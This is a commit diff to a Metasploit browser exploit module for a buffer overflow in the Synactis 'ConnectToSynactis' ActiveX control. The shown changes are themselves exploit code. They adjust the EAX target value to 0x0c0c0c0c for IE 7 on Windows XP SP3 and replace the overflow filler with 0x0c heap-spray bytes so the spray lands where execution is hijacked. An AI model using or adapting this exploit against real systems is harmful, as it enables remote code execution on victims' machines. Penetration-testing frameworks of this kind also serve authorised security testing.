Fix different landings

Author: wchen-r7

modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb

@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		:classid    => "{C80CAF1F-C58E-11D5-A093-006097ED77E6}",
 		:method     => "ConnectToSynactis",
 		:os_name    => OperatingSystems::WINDOWS,
-		:rank       => Rank
+		:rank       => NormalRanking
 	})
 
 	def initialize(info={})
@@ -60,7 +60,7 @@ class pointer saved on the stack, and results in arbitrary code execution under
 					# Newer setups like Win + IE8: "Object doesn't support this property or method"
 					[ 'Automatic', {} ],
 					[
-						'IE 7 on Windows XP SP3', {'Eax' => 0x20302028}
+						'IE 7 on Windows XP SP3', {'Eax' => 0x0c0c0c0c}
 					],
 					[
 						# 0x20302020 = Where the heap spray will land
@@ -171,8 +171,8 @@ def get_html(cli, req, target)
 			var p2 = '';
 			eax = "#{eax}";
 
-			while (p1.length < 189)  p1 += "\\x41";
-			while (p2.length < 7000) p2 += "\\x42";
+			while (p1.length < 189)  p1 += "\\x0c";
+			while (p2.length < 7000) p2 += "\\x0c";
 
 			var obj = document.getElementById("obj");
 			obj.ConnectToSynactis(p1+eax+p2);